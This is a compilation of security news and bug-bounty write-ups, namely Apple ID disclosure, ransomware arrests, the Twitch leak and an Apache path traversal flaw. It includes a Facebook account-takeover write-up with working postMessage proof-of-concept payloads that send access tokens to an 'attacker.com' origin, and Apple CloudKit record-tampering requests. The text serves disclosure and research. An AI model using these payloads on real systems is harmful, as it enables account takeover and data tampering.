Wednesday, December 4th 2019: I try to pull some strings with friends to get a reply.
December 10th 2019: I ask if there is an update.
Friday, January 10th 2020: I get an automated email saying, in essence, (1) don't disclose the bug to the public until 'investigation is complete' and (2) Apple will provide information over the course of the investigation. Email for an update.
Wednesday, January 29th 2020: Ask for another update (at the 2 month mark).
Friday, January 31st 2020: Am asked to check if it's been fixed. Yes, but not exactly in the way I might have liked.
Sunday, February 2nd 2020: At ShmooCon, a security conference in Washington DC, I happen to meet the director of the responsible disclosure program. I talk about the difficulties I've had.
Tuesday, February 4th 2020: Apple confirms the bug as fixed and asks for my name to give credit on the Apple Hall of Fame (as of August 2021, I have still not been publicly credited). I reply asking if this is covered by the bounty program. Apple responds saying that they will let me know later.
Saturday, February 15th 2020: I ask for an update on status.
Monday, February 17th 2020: Apple responds: no updates. I ask when I'll hear back.
Friday, February 21st 2020: I contact the director of the program with the details I got at ShmooCon, asking what the expected turnaround on bugs is.
Monday, March 2nd 2020: Apple responds. They say they have no specific date.
Tuesday, March 3rd 2020: The director responds, saying they don't give estimates on timelines, but he'll get it looked into.
Tuesday, March 24th 2020: Offered $10,000 for the Apple ID code injection vulnerability. Asked to register as an Apple developer so I can get paid through there.
Sunday, March 29th 2020: Enroll in the Apple Developer program, and ask when I'll be able to disclose publicly.
Tuesday, March 31st 2020: Told to accept the terms and set up my account and tax information (I am not told anything about disclosure).
Tuesday, March 31st 2020: Ask for more detailed instructions, because I can't find out how to set up my account and tax information (this is because my Apple Developer application has not yet been accepted).
Thursday, April 2nd 2020: Ask if this is being considered as a generic XSS, because the payout seems weird compared to the examples.
Tuesday, April 28th 2020: Apple replies to my request for more detailed instructions (it's the same thing, but reworded).
May 13th 2020: I ask for an update.
May 18th 2020: Am told the money is "in process to be paid", with no exact date, but expected in May or early June. They'll get back when they know.
May 18th 2020: I ask again when I can disclose.
May 23rd 2020: I am told my information has been sent to the accounts team, and that Apple will contact me about it when appropriate.
June 8th 2020: I ask for some kind of update on payment, or on when I can disclose.
June 10th 2020: I am informed that there is 'a new process'. The new process means I pay for my Apple Developer account myself, and Apple reimburses me that cost. I tell Apple I did this several months ago, and ask how my bug was classified within the program. I also contact the Apple security director asking if I can get help. He's no longer with Apple.
June 15th 2020: Apple asks me to provide an 'enrolment ID'.
June 15th 2020: I send Apple a screenshot of what I am seeing. All my application shows is 'Contact us to continue your enrolment'. I say I'm pretty frustrated and threaten to disclose the vulnerability if I am not given some way forward on several questions: (1) how the bug was classified, (2) when I can disclose this, and (3) what I am missing to get paid. I also rant about it on Twitter, which, in retrospect, was probably the most productive thing I did to get a proper response.
June 19th 2020: Apple gets in touch, saying they've completed the account review and now I need to set up a bank account to get paid in. Apple says they're OK with disclosing, as long as the issue is addressed in an update. Apple asks for a draft of my disclosure.
Thursday, July 2nd 2020: The Apple people are very gracious. They say thanks for the report, and say my writeup is pretty good. Whoever is answering is very surprised by the place in the draft where I say I found this bug only "a few days ago", and asks me to correct it 🤔
July 29th 2020: I get paid.
… the pandemic happens …
12 August 2021: I finish my writeup!

Amendments

22/Aug/21: Fixed link to 'full source code', which originally linked to only a very small portion of the full source.

Source: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41
3. Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents.

The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from Europol's European Cybercrime Centre and INTERPOL's Cyber Fusion Centre.

"The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met."

Besides the two arrests, the international police operation involved a total of seven property raids, leading to the seizure of $375,000 in cash and two luxury vehicles costing €217,000 ($251,543), as well as the freezing of cryptocurrency assets worth $1.3 million.

The suspects are believed to have demanded hefty sums ranging anywhere between €5 million and €70 million as part of their extortion spree, and are connected to a gang that has staged ransomware attacks against more than 100 different companies, causing damages upwards of $150 million, according to the Ukrainian National Police. The identity of the syndicate has not been disclosed.

One of the two arrestees, a 25-year-old Ukrainian national, allegedly deployed "virus software" by breaking into remote working programs, with the intrusions staged through social engineering campaigns that delivered spam messages containing malicious content to corporate email inboxes, the agency added.

The development comes over three months after the Ukrainian authorities took steps to arrest members of the Clop ransomware gang and disrupt the infrastructure the group employed in attacks targeting victims worldwide dating all the way back to 2019.

Source: https://thehackernews.com/2021/10/ransomware-hackers-who-attacked-over.html
4. An unknown individual has leaked the source code and business data of video streaming platform Twitch via a torrent file posted on the 4chan discussion board earlier today.

The leaker said they shared the data as a response to the recent "hate raids" —coordinated bot attacks posting hateful and abusive content in Twitch chats— that have plagued the platform's top streamers over the summer.

"Their community is […] a disgusting toxic cesspool, so to foster more disruption and competition in the online video streaming space, we have completely pwned them, and in part one, are releasing the source code from almost 6,000 internal Git repositories," the leaker said earlier today.

The Record has downloaded parts of the 125 GB torrent file shared by the leaker in order to confirm its authenticity. The content of the leak is in tune with what the leaker claimed to have shared earlier today, quoted below:

• Entirety of Twitch.tv, with commit history going back to its early beginnings
• Mobile, desktop and video game console Twitch clients
• Various proprietary SDKs and internal AWS services used by Twitch
• Every other property that Twitch owns, including IGDB and CurseForge
• An unreleased Steam competitor from Amazon Game Studios
• Twitch SOC internal red teaming tools (lol)
• AND: Creator payout reports from 2019 until now. Find out how much your favorite streamer is really making!

Among the treasure trove of data, the most sensitive folders are the ones holding information about Twitch's user identity and authentication mechanisms, admin management tools, and data from Twitch's internal security team, including white-boarded threat models describing various parts of Twitch's backend infrastructure [see redacted image below].

While at the time of writing The Record was unable to find personal details for any Twitch users, the leak also contained payout schemes for the platform's top streamers, some of whom had already confirmed its accuracy [1, 2, 3, 4]. The data, which we will not be linking or sharing in any way, exposes the monthly revenues of some of the platform's biggest earners, some of which reach six-figure sums; data that could be a boon for extortionists and criminal groups.

A Twitch spokesperson did not immediately return a request for comment regarding today's leak.

The source of the leak is currently believed to be an internal Git server. Git servers are typically used by companies to allow large teams of programmers to make controlled and easily reversible changes to source code repositories. The leak was also labeled as "part one," suggesting that more data will be leaked in the future.

Although no user data was found in the leak, several security researchers have urged users to change their passwords and enable a multi-factor authentication solution for their account as a precaution.

The leak comes a month after thousands of Twitch streamers organized the #ADayOffTwitch walkout on September 1, refusing to stream in response to the ever-increasing hate raids. In August, Twitch promised to address the hate raids in a message posted on Twitter, asking for patience as the spam attacks did not have "a simple fix."

Article text has been updated with additional screenshots of the leak and confirmations from Twitch streamers. Title and text have been updated to remove mention of the Anonymous hacker collective as the source of the leak.

Source: https://therecord.media/twitch-source-code-and-business-data-leaked-on-4chan/
5. Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild.

"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday. "If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts."

The flaw, tracked as CVE-2021-41773, affects only Apache HTTP Server version 2.4.49. Ash Daulton and the cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021.

Also resolved by Apache is a null pointer dereference vulnerability observed while processing HTTP/2 requests (CVE-2021-41524), which could allow an adversary to perform a denial-of-service (DoS) attack on the server. The non-profit corporation said the weakness was introduced in version 2.4.49.

Apache users are highly recommended to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw.

Source: https://securityaffairs.co/wordpress/122999/hacking/apache-zero-day-flaw.html
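The 'require all denied' protection the advisory refers to is ordinary Apache 2.4 configuration. A minimal sketch of that hardening (the paths are illustrative, not from the advisory):

    # Deny filesystem access by default...
    <Directory />
        Require all denied
    </Directory>

    # ...then explicitly re-allow only the intended document root.
    <Directory /var/www/html>
        Require all granted
    </Directory>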
6. Summary

Facebook has allowed online game owners to host their games/applications on apps.facebook.com for many years now. The idea and technology behind it was that the game (Flash or HTML5 based) would be hosted on the owner's website, and the page hosting it would then be shown to the Facebook user on apps.facebook.com inside a controlled iframe. Since the game is not hosted on Facebook, and for the best user experience (like keeping score and profile data), Facebook had to establish a communication channel with the game owner, for example to verify the identity of the Facebook user. This was done using cross-window communication/messaging between apps.facebook.com and the game website inside the iframe. In this blog post, I'll be discussing multiple vulnerabilities I found in this implementation.

Vulnerability potential

These bugs were found after careful auditing of the client-side code inside apps.facebook.com responsible for verifying what comes through this channel. The bugs explained below (and others) allowed me to take over any Facebook account if the user decided to visit my game page inside apps.facebook.com. The severity of these bugs is high, since they were present for years, and billions of users and their information could have been compromised easily, as this was served from inside Facebook. Facebook confirmed they didn't see any indicators of previous abuse or exploitation of these bugs.

For researchers

Before explaining the actual bugs below, I tried to show the way I decomposed the code, and a simplified path to track the flow of the message data and how its components are used. I probably didn't leave much to dig into, but I hope the information shared can help you in your research. If you are only interested in the bugs themselves, jump to each bug's section below.

Description

So far we know that the game page being served inside an iframe on apps.facebook.com communicates with the parent window to ask Facebook to perform some actions. Among the requested actions, for example, is showing a dialog that lets the user confirm the usage of the Facebook application owned by the game developers, which would help the game identify the user and get some information via an access token it receives if the user decides to use the application. The script responsible for receiving the cross-window messages, interpreting them and understanding the requested action is below (only the necessary parts are shown, as they were before the bugs were fixed):

__d("XdArbiter", ...
    handleMessage: function(a, b, e) {
        d("Log").debug("XdArbiter at " + (window.name != null && window.name !== "" ? window.name : window == top ? "top" : "[no name]") + " handleMessage " + JSON.stringify(a));
        if (typeof a === "string" && /^FB_RPC:/.test(a)) {
            k.enqueue([a.substring(7), {
                origin: b,
                source: e || i[h]
            }]);
    ...
    send: function(a, b, e) {
        var f = e in i ? e : h;
        a = typeof a === "string" ? a : c("QueryString").encode(a);
        b = b;
        try {
            d("SecurePostMessage").sendMessageToSpecificOrigin(b, a, e)
        } catch (a) {
            d("Log").error("XdArbiter: Proxy for %s not available, page might have been navigated: %s", f, a.message), delete i[f]
        }
        return !0
    }
    ...
window.addEventListener("message", function(a) {
    if (a.data.xdArbiterSyn) d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, {
        xdArbiterAck: !0
    });
    else if (a.data.xdArbiterRegister) {
        var b = l.register(a.source, a.data.xdProxyName, a.data.origin, a.origin);
        d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, {
            xdArbiterRegisterAck: b
        })
    } else a.data.xdArbiterHandleMessage && l.handleMessage(a.data.message, a.data.origin, a.source)
}), 98);

__d("JSONRPC", ...
    c.read = function(a, c) {
        ...
        e = this.local[a.method];
        try {
            e = e.apply(c || null, a.params);
            typeof e !== "undefined" && g("result", e)
        ...
    e.exports = a
}), null);

__d("PlatformAppController", ...
    function f(a, b, e) {
        ...
        c("PlatformDialogClient").async(f, a, function(d) {
            ...
            b(d)
        });
    }...
    t.local.showDialog = f;
    ...
    t = new(c("JSONRPC"))(function(a, b) {
        var d = b.origin || k;
        b = b.source;
        if (b == null) {
            var e = c("ge")(j);
            b = e.contentWindow
        }
        c("XdArbiter").send("FB_RPC:" + a, b, d)
    }
    ...
}), null);

__d("PlatformDialogClient", ...
    function async(a, b, e) {
        var f = c("guid")(),
            g = b.state;
        b.state = f;
        b.redirect_uri = new(c("URI"))("/dialog/return/arbiter").setSubdomain("www").setFragment(c("QueryString").encode({
            origin: b.redirect_uri
        })).getQualifiedURI().toString();
        b.display = "async";
        j[f] = {
            callback: e || function() {},
            state: g
        };
        e = "POST";
        d("AsyncDialog").send(new(c("AsyncRequest"))(this.getURI(a, b)).setMethod(e).setReadOnly(!0).setAbortHandler(k(f)).setErrorHandler(l(f)))
    }
    ...
    function getURI(a, b) {
        if (b.version) {
            var d = new(c("URI"))("/" + b.version + "/dialog/" + a);
            delete b.version;
            return d.addQueryData(b)
        }
        return c("PlatformVersioning").versionAwareURI(new(c("URI"))("/dialog/" + a).addQueryData(b))
    }
}), 98);

To simplify the flow, in case someone decides to dig more into it and look for more bugs:

Iframe sends message to parent
=> Message event dispatched in XdArbiter
=> Message handler function passes data to handleMessage function
=> "enqueue" function passes to JSONRPC
=> JSONRPC.read calls this.local.showDialog function in PlatformAppController
=> function checks message and, if all is valid, calls PlatformDialogClient
=> PlatformDialogClient.async sends a POST request to apps.facebook.com/dialog/oauth; the returned access_token would be passed to XdArbiter.send function (a few steps were skipped)
=> XdArbiter.send sends a cross-window message to the iframe window
=> Event dispatched in iframe window containing the Facebook user access_token

Below is an example of simple code to construct the message to be sent to apps.facebook.com from the iframe; a similar one would be sent from any game page using the Facebook JavaScript SDK, but with more unnecessary parts:

msg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://ysamm.com/callback","app_id":"APP_ID","client_id":"APP_ID","response_type":"token"}]})
fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + msg , origin: IFRAME_ORIGIN}
window.parent.postMessage(fullmsg,"*");

The interesting parts to manipulate are:

– IFRAME_ORIGIN, which is used in the redirect_uri parameter sent with the POST request to apps.facebook.com/dialog/oauth, verified server-side to be a domain owned by the application requesting an access_token, and then used as the targetOrigin in postMessage when sending the cross-window message carrying the access_token back to the iframe.
– Keys and values of the object inside params: these are the parameters to be appended to apps.facebook.com/dialog/oauth. The most interesting ones are redirect_uri (which can replace IFRAME_ORIGIN in the POST request in some cases) and APP_ID.

Attack vectors/scenarios

Instead of requesting an access token for the game application we own, we'll try to get one for a Facebook first-party application like Instagram. What's holding us back is that although we control IFRAME_ORIGIN and APP_ID, which we can set to match the Instagram application as www.instagram.com and 124024574287414, the message later sent to the iframe containing the first-party access token would use www.instagram.com as the targetOrigin in postMessage, which is not our window origin. Facebook did a good job protecting against these attacks (though I'd argue that using the origin from the received message event, and matching the app_id to the hosted game instead of giving us total freedom, could have prevented all these bugs), but apparently they left some weaknesses that could have been exploited for many years.

Bug 1: Parameter pollution, it was checked server-side and we definitely should trust it

This bug occurs due to the fact that the POST request to https://apps.facebook.com/dialog/oauth, when constructed from the message received from the iframe, can contain user-controlled parameters. All parameters are checked client-side (PlatformAppController, the showDialog method, and the PlatformDialogClient.async method), and duplicate parameters are removed in PlatformAppController; the AsyncRequest module also seems to do some filtering (removing parameters that already exist but with brackets appended). However, due to some missing checks server-side, a parameter name set to PARAM[random would replace a previously set parameter PARAM; for example, the value of a redirect_uri[0 parameter would replace redirect_uri. We can abuse this as follows:

1) Set APP_ID to be the Instagram application id.
2) The redirect_uri will be constructed in PlatformDialogClient.async (line 72) using IFRAME_ORIGIN (it will end up as https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com), which would be sent matching our iframe window origin, but won't be used at all, as explained below.
3) Set redirect_uri[0 in params as an additional parameter (order matters, so it must come after redirect_uri) to https://www.instagram.com/accounts/signup/, which is a valid redirect_uri for the Instagram application.

The URL of the POST request ends up being something like this:

https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com&app_id=124024574287414&client_id=124024574287414&response_type=token&redirect_uri[0=https://www.instagram.com/accounts/signup/

The request ends up succeeding and returning a first-party access token, since redirect_uri[0 replaces redirect_uri and is itself a valid redirect_uri. On the client side, though, the logic is: if an access_token was received, the origin used to construct the redirect_uri must have worked with the app_id, so it should be trusted and used to send the message to the iframe. Behind the scenes, though, redirect_uri[0 was used and not redirect_uri. (Cool, right?)
Proof of concept:

xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://attacker.com/callback","app_id":"124024574287414","client_id":"124024574287414","response_type":"token","redirect_uri[0":"https://www.instagram.com/accounts/signup/"}]})
fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"}
window.parent.postMessage(fullmsg,"*");

Bug 2: Why bother, Origin is undefined

The main problem here is that the /dialog/oauth endpoint accepts https://www.facebook.com/dialog/return/arbiter as a valid redirect_uri (without a valid origin in the fragment part) for third-party applications and some first-party ones. The second problem is that for this behaviour to occur (no origin in the fragment part), the message sent from the iframe to apps.facebook.com must not contain a.data.origin (IFRAME_ORIGIN is undefined); however, this same value is used later to send a cross-window message to the iframe, and if null or undefined is used, the message won't be received. Luckily, I noticed that the JSONRPC function always receives a non-null postMessage origin (Line 55). Since b.origin is undefined or null, k is chosen. k can be set by the attacker by first registering a valid origin via c("Arbiter").subscribe("XdArbiter/register"), which is invoked if our message has xdArbiterRegister and a specified origin. Before the "k" variable is set, the supplied origin is first checked to belong to the attacker's application using the "/platform/app_owned_url_check/" endpoint. This is wrong, and the second problem occurs here: nothing ensures that the next cross-window message sent from the iframe supplies the same APP_ID. Not all first-party applications are vulnerable to this, though. I used the Facebook Watch for Android application or Portal to get a first-party access_token.

The URL of the POST request would be something like this:

https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter&app_id=1348564698517390&client_id=1348564698517390&response_type=token

Proof of concept:

window.parent.postMessage({xdArbiterRegister:true,origin:"https://attacker.com"},"*")
xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","app_id":"1348564698517390","client_id":"1348564698517390","response_type":"token"}]})
fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg}
window.parent.postMessage(fullmsg,"*");

Bug 3: Total Chaos, version can't be harmful

This bug occurs in the PlatformDialogClient.getURI function, which is responsible for setting the API version in front of the /dialog/oauth endpoint. This function didn't check for double dots or added paths and directly constructed a URI object to be used later to send an XHR request (Line 86). The version property in params, passed in the cross-window message sent to apps.facebook.com, could be set to api/graphql/?doc_id=DOC_ID&variables=VAR# and would eventually lead to a POST request sent to the GraphQL endpoint with a valid user CSRF token. DOC_ID and VAR could be set to the id of a GraphQL mutation that adds a phone number to the account, and the variables of this mutation.
The URL of the POST request would be something like this:

https://apps.facebook.com/api/graphql?doc_id=DOC_ID&variables=VAR&?/dialog/oauth&state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=attacker&app_id=1348564698517390&client_id=1348564698517390&response_type=token

Proof of concept:

xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","client_id":"APP_ID","response_type":"token","version":"api/graphql?doc_id=DOC_ID&variables=VAR&"}]})
fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"}
window.parent.postMessage(fullmsg,"*");

Timeline

Aug 4, 2021 — Report sent
Aug 4, 2021 — Acknowledged by Facebook
Aug 6, 2021 — Fixed by Facebook
Sep 2, 2021 — $42,000 bounty awarded by Facebook

Aug 9, 2021 — Report sent
Aug 9, 2021 — Acknowledged by Facebook
Aug 12, 2021 — Fixed by Facebook
Aug 31, 2021 — $42,000 bounty awarded by Facebook

Aug 12, 2021 — Report sent
Aug 13, 2021 — Acknowledged by Facebook
Aug 17, 2021 — Fixed by Facebook
Sep 2, 2021 — $42,000 bounty awarded by Facebook

Source: https://ysamm.com/?p=708
7. TL;DR: CloudKit, Apple's data storage framework, has various access controls. These access controls could be misconfigured, even by Apple themselves, which affected Apple's own apps using CloudKit. This blog post explains in detail three bugs of different criticality, found in iCrowd+, Apple News and Apple Shortcuts, uncovered by Frans Rosén while hacking CloudKit. All bugs were reported to and fixed by the Apple Security Bounty program.

Intro

Ever since the fantastic "We Hacked Apple for 3 Months" article by Ziot, Sam, Ben, Samuel and Tanner, I wanted to approach Apple myself, looking for bugs with my own mindset. The article they wrote is still one of the best inspirational posts I've ever read, and it's still a post I regularly go back to for more info.

In the middle of February this year I had the ability to spend some time, and I decided to go all in on hunting bugs on Apple. If you've been in and out of bug hunting, you might recognize the kind of feeling I had. I felt that I sucked, that I could not find anything interesting. Ben and the team had already found all the bugs, right? It took me three days, three days of fighting the imposter syndrome, feeling worthless and almost stressed by not getting anywhere. I was intercepting requests all over the place, modifying things cluelessly and expecting miracles. Miracles don't work that way. On the third day, I started to connect the dots, realized how certain assets connected to other assets, and started to understand more about how things worked. This is when some of the first bugs popped up, finally restoring my self-esteem a bit, making me more relaxed and focused going forward. I dug up an old jailbroken iPad I had, which allowed me to proxy all content through my laptop. I downloaded all Apple-owned apps and started looking at the traffic.

What is CloudKit?

Quite early on I noticed that a lot of Apple's own apps used a technology called CloudKit; you could say it is Apple's equivalent to Google's Firebase. It has database storage that you can authenticate against to fetch and save records directly from the client itself. I started reading the CloudKit documentation, used the CloudKit Catalog tool and created my own container to play around with it. Before getting into the hacking of CloudKit, here's a short description of its structure, the 30-second explanation:

You create a container with a name. The suggested format is a reversed domain structure, like com.apple.xxx. All containers you create yourself will begin with iCloud.

Inside the container you have two environments, Development and Production.

Inside the environments you have three different scopes: Private, Shared and Public. Private is only accessible by your own user. Shared is used for data being shared between users, and Public is accessible by anyone, some parts with a public API token and some with authentication (with some exceptions, I'll get to that below).

Inside each scope, you have different zones you can create. The default zone is called _defaultZone.

Inside each zone, you have different record types that you can create yourself. Each record type can contain different record fields; these fields can hold different types of data, like INT, BOOLEAN, TEXT, BINARY etc.

Inside each zone you also have records. Each record is always connected to a record type.

There are even more features to it, of course, for example the ability to create indexes and security roles with permissions.
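To make the structure above concrete, here is a minimal sketch of reading records from a container's Public scope through the CloudKit web services API (Node 18+). The container name, API token and record type are hypothetical placeholders; the endpoint shape matches the api.apple-cloudkit.com requests that show up later in this post:

// Minimal sketch: query one record type from the Public scope of a container.
// Container, token and record type below are placeholders, not real values.
const container = "iCloud.com.example.mycontainer";
const apiToken = "PUBLIC_API_TOKEN";
const url = "https://api.apple-cloudkit.com/database/1/" + container +
  "/production/public/records/query?ckAPIToken=" + apiToken;

async function listRecords() {
  const res = await fetch(url, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      zoneID: { zoneName: "_defaultZone" },    // the default zone of the scope
      query: { recordType: "SomeRecordType" }, // a record type defined in the container
    }),
  });
  const data = await res.json();
  for (const record of data.records ?? []) {
    console.log(record.recordName, record.recordType, record.fields);
  }
}

listRecords();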
For the Private and Shared scopes, you always need to authenticate as yourself. For the Public scope, you can have the ability to both read and write without personal authentication. You can enable public tokens that give access to the public scope; combined with authenticating as your own user, they give access to the Private and Shared scopes as well.

It was quite complex to understand all the different authentication flows and security roles, and this made me curious. Could it be that this was not only complex for me to understand, but also for the teams using it internally at Apple? I started investigating where it was being used and for what.

Reconnaissance

To understand where the CloudKit service was used by Apple themselves, I started to look at the ways all the different apps connected to it. By proxying everything from the iPad and the browser and using all the apps, I could gather a bunch of requests and responses. Looking through them, I noticed that Apple used different ways to connect to CloudKit. The iCloud assets, like Notes and Photos on www.icloud.com, used one API:

POST /database/1/com.apple.notes/production/public/records/resolve?...
Host: p55-ckdatabasews.icloud.com

and the developer portal at icloud.developer.apple.com had a different API:

POST /r/v4/user/iCloud.com.mycontainer.test/Production/public/records/query?team_id=9DCADDBE3F HTTP/1.1
Host: p25-ckdatabasews.icloud.apple.com

A lot of iOS apps used a third API at gateway.icloud.com. This API used headers to specify which container was being used. These requests were almost always using protobuf:

POST /ckdatabase/api/client/record/save HTTP/1.1
Host: gateway.icloud.com:443
X-CloudKit-ContainerId: com.apple.siri.data
Accept: application/x-protobuf
Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true

If you used the CloudKit Catalog to test the CloudKit API, it would instead use api.apple-cloudkit.com:

POST /database/1/iCloud.com.example.CloudKitCatalog/production/public/records/query?...
Host: api.apple-cloudkit.com

For CloudKit Catalog you needed an API token to get access to the public scope. When I tried connecting to the CloudKit containers I had seen while intercepting the iOS apps, I failed due to the lack of the API token needed to complete the authentication flow.

iCrowd+

When testing all the apps and subdomains of Apple, one website made by Apple was actually utilizing api.apple-cloudkit.com with an API token provided. Going to https://public.icrowd.apple.com/ I could see the containers being used in the JavaScript file:

containers: [{
containerIdentifier:"iCloud.com.apple.phonemo",
apiTokenAuth: { apiToken:"f260733f..." },
environment:"production"
}, {
containerIdentifier:"iCloud.com.apple.icrowd",
apiTokenAuth: { apiToken:"b90c3b24..."
},
environment:"production"
}]

It then made a request to fetch the current version of the iCrowd+ application, to show the version on the start page. I could also see in the requests made by the website that it was querying the records of the database, and that the record type was called Updates:

"records" : [ { "recordName" :"FD935FB2-A401-6F05-E9D8-631BBC2A68A1", "recordType" :"Updates", "fields" : { "name" : { "value" :"iCrowd", "type" :"STRING" }, "description" : { "value" :"Updated to support iOS 14 and Personalized Hey Siri project.", "type" :"STRING" }, "version" : { "value" :"2.16.3", "type" :"STRING" }, "required" : { "value" :1, "type" :"INT64" } },

Since I had the token, I could use the CloudKit Catalog to connect to the container:

https://cdn.apple-cloudkit.com/cloudkit-catalog/?container=iCloud.com.apple.phonemo&environment=production&apiToken=f260733f...#authentication

Looking at the records of the Public scope, I could see the data the website was fetching for the version button. I then tried to add my own record to the same zone, and got a successful response. When I accessed the website again at https://public.icrowd.apple.com/, my own record showed up. I realized that I could modify the data of the website, made a report to Apple on the 17th of February, and quickly deleted my record again, sending along a video showing the proof of concept.

I now realized that there might be other bugs related to permissions, and that the public scope was the most interesting one, since it is shared among all users. I continued the process of finding where CloudKit databases were being utilized.

Apple's response

Apple responded and fixed the issue on the 25th of February by completely removing the usage of CloudKit from the website at https://public.icrowd.apple.com/.

Apple News

Apple News was not really accessible from Sweden, so I created a new Apple ID based in the United States to be able to use it. As soon as I got in, I noticed that all news was served using CloudKit, and all articles were served from the public scope. That made sense, since news content is the same for all users. I could also see that the Stocks app on iOS fetched from the same container:

GET /ckdatabase/stocks/topstories/WHT4Rx3... HTTP/1.1
Host: gateway.icloud.com:443
X-CloudKit-ContainerId: com.apple.news.public
X-CloudKit-DatabaseScope: Public
X-CloudKit-BundleId: com.apple.stocks
User-Agent: AppleNews/679 Version/3.1
X-MMe-Client-Info: <iPad5,4> <iPhone OS;14.2;18B92> <com.apple.newscore/6.1 (com.apple.stocks/3.1)>

Using the CloudKit API through gateway.icloud.com was tricky, though: all communication was made through protobuf. There is an awesome project called InflatableDonkey that tries to reverse engineer the iCloud backup process from iOS 9. Since that project only focused on fetching data, a lot of methods in the protobuf were not fully reversed, so I had to bruteforce a bit to find the methods needed for modifications as well. Since protobuf is binary, I didn't really need the proper names; each property in the protobuf is enumerable due to how the format is designed.

I spent way too much time on this, almost two days straight, but as soon as I found methods I could use, modification of records in the Public scope still needed authorization for my user, and I was never able to figure out how to generate an X-CloudKit-AuthToken for the proper scope, since I was mainly interested in the Private scope.
But remember that I mentioned different APIs talked with CloudKit differently? I logged in to www.icloud.com and went to the Notes app, which talked with CloudKit using p55-ckdatabasews.icloud.com:

POST /database/1/com.apple.notes/production/private/records/query?clientBuildNumber=2104Project55&clientMasteringNumber=2104B31 HTTP/1.1
Host: p55-ckdatabasews.icloud.com

I then changed the container from com.apple.notes to com.apple.news.public, with the public scope instead. I also extracted one of the articles I could see in the protobuf communication to gateway.icloud.com while using the app:

POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38& clientMasteringNumber=2102Hotfix38 HTTP/1.1
Host: p55-ckdatabasews.icloud.com
Cookie: X-APPLE-WEB-ID=...

{ "records": { "recordName":"A-OQYAcObS_W_21xWarFxFQ" }, "zoneID": { "zoneName":"_defaultZone" } }

And the response was:

{ "records" : [ { "recordName" :"A-OQYAcObS_W_21xWarFxFQ", "recordType" :"Article", "fields" : { "iAdKeywords" : { "value" : ["TGiSf6ByLEeqXjy5yjOiBJQ","TGiSr-hyLEeqXjy5yjOiBJQ","TdNFQ6jKmRsSURg96xf4Xiw" ], "type" :"STRING_LIST" }, "topicFlags_143455" : { "value" : [12,0 ], "type" :"INT64_LIST" ...

I also verified that stock data was present:

{ "records": { "recordName":"S-AAPL" }, "zoneID": { "zoneName":"_defaultZone" } }

This gave me:

{ "records" : [ { "recordName" :"S-AAPL", "recordType" :"Stock", "fields" : { "stockEntityID" : { "value" :"EKaaFEbKHS32-pJMZGHyfNw", "type" :"STRING" }, "symbol" : { "value" :"AAPL", "type" :"STRING" }, "feedConfiguration_143441" : { "value" :"{\"feedID\":\"EKaaFEbKHS32-pJMZGHyfNw$en-US\"}", "type" :"STRING" },

Success! I now knew that I could talk with the com.apple.news.public container using the authenticated API on p55-ckdatabasews.icloud.com. I had a different Apple ID set up as a News Publisher, so I could create article drafts and create a published channel in the Apple News app. I created a channel and an article and started testing calls against them. Since the Apple ID I used for making requests to the API was not the publisher account, I knew that if I could make modifications to that content, I could modify any article or stock data.

The Channel-ID I had was TtVkjIR3aTPKrWAykey3ANA. Making a lookup query:

POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1
Host: p55-ckdatabasews.icloud.com
Cookie: X-APPLE-WEB-ID=...

showed me my test channel:

{ "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "recordType" :"Tag", "fields" : { "relatedTopicTagIDsForOnboarding_143455" : { "value" : [ ], "type" :"STRING_LIST" }, "defaultSectionTagID" : { "value" :"T18PTnZkqQ0qgW33zGzxs8w", "type" :"STRING" }, ... "name" : { "value" :"moa oma", "type" :"STRING" },

